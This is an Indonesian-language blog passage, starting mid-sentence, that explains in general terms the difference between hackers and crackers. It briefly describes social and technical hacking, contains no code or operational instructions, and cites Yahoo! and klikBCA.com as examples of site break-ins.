Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama, kasus klikBCA.com yang paling hangat dibicarakan beberapa waktu yang lalu.

>>Ada beberapa jenis kegiatan hacking, diantaranya adalah: Social Hacking, yang perlu diketahui : informasi tentang system apa yang dipergunakan oleh server, siapa pemilik server, siapa Admin yang mengelola server, koneksi yang dipergunakan jenis apa lalu bagaimana server itu tersambung internet, mempergunakan koneksi siapa lalu informasi apa saja yang disediakan oleh server tersebut, apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan informasi lainnya.

>>Technical Hacking, merupakan tindakan teknis untuk melakukan penyusupan ke dalam system, baik dengan alat bantu (tool) atau dengan mempergunakan fasilitas system itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam system atau service. Inti dari kegiatan ini adalah mendapatkan akses penuh kedalam system dengan cara apapun dan bagaimana pun.

>>Jadi dapat diambil kesimpulannya bahwa Hacker yang ‘baik’ adalah orang yang
mengetahui apa yang
dilakukannya, menyadari seluruh
akibat dari apa yang
dilakukannya, dan bertanggung jawab atas apa yang dilakukannya.
Sementara hacker
yang ‘jahat’ atau biasa disebut cracker adalah orang yang tahu apa yang dikerjakannya, tetapi seringkali tidak menyadari akibat dari perbuatannya. Dan ia tidak mau bertanggung jawab atas apa yang telah diketahui dan dilakukannya itu. Karena hacker adalah orang yang tahu dalam ketahuannya, di dunia hackers tentu saja ada etika yang mesti dipenuhi dan dipatuhi bersama.
Lebih jauh lagi tentang Cracker,

>>Cracker adalah seseorang yang berusaha untuk menembus sistem komputer orang lain atau menerobos sistem keamanan komputer orang lain untuk mengeruk keuntungan atau melakukan tindak kejahatan.
Inilah yang membedakannya dengan hacker.

>Prinsip kerja hacker dan cracker sebenarnya sama. Yang membedakan keduanya adalah tujuannya. Dari segi kemampuan, cracker dan hacker juga tidak jauh berbeda.
Tapi cracker seringkali memiliki ilmu yang lebih oke dan keberanian serta kenekatan yang lebih besar daripada hacker.

Namun dari segi mentalitas dan integritas, keduanya beda jauh.
Ok, semoga penjelasan diatas bisa bermanfaat dan menambah pengetahuan Anda agar bisa membedakan mana yang baik dan mana yang Buruk.
 
di ambil dari artikel : http://www.imranxrhia.com/2010/11/mendengar-kata-hacker-pasti-banyak-dari.html